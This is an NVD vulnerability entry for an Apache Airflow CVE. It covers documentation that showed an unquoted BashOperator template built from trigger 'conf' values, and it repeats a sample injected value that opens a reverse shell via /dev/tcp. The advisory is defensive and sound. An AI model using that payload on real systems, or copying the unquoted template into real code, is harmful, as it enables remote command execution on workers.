You are viewing this page in an unauthorized frame window.
This is a potential security issue, you are being redirected to
https://nvd.nist.gov
An official website of the United States government
Official websites use .gov
A .gov website belongs to an official government organization in the United States.
Secure .gov websites use HTTPS
A lock () or https:// means you've safely connected to the .gov website. Share sensitive information only on official, secure websites.
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Metrics
NVD enrichment efforts reference publicly available information to associate
vector strings. CVSS information contributed by other sources is also
displayed.
By selecting these links, you will be leaving NIST webspace.
We have provided these links to other web sites because they
may have information that would be of interest to you. No
inferences should be drawn on account of other sites being
referenced, or not, from this page. There may be other web
sites that are more appropriate for your purpose. NIST does
not necessarily endorse the views expressed, or concur with
the facts presented on these sites. Further, NIST does not
endorse any commercial products that may be mentioned on
these sites. Please address comments about this page to [email protected].
Title: Apache Airflow de Apache Software Foundation, Description: La documentación oficial de Apache Airflow en 'core-concepts/dag-run.html' ( Pasando parámetros al activar Dags ) mostraba un ejemplo textual de 'BashOperator(bash_command="echo value: {{ dag_run.conf[ conf1 ] }}")' sin ninguna advertencia de entrecomillado / saneamiento. Los autores de Dags que copiaron el patrón textualmente en despliegues donde los usuarios tenían permiso 'Dag.can_trigger' en el Dag afectado (despliegues multi-equipo típicos, ofertas alojadas que exponen una API de activación) podrían estar expuestos a inyección de metacaracteres de shell a través del campo 'conf' de la API de activación: un usuario de activación autenticado podría suministrar '"; bash -i & /dev/tcp/.../9999 0 &1; #"' como valor de 'conf' y alcanzar un 'os.exec' en el worker. Este CVE cubre la corrección de la documentación en 'apache/airflow' PR 64129 - el patrón en el ejemplo de la documentación ahora incluye entrecomillado de shell explícito y una advertencia de seguridad. Afecta a los despliegues cuyo código de Dag fue modelado según el ejemplo de la documentación pre-corrección. De la misma clase que las correcciones de patrón de documentación anteriores CVE-2025-50213 y CVE-2025-27018. Se aconseja a los usuarios actualizar a 'apache-airflow' 3.2.2 o posterior para obtener la documentación corregida que se incluye con la versión.
New CVE Received from Apache Software Foundation6/01/2026 5:16:18 AM
Action
Type
Old Value
New Value
Added
Description
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.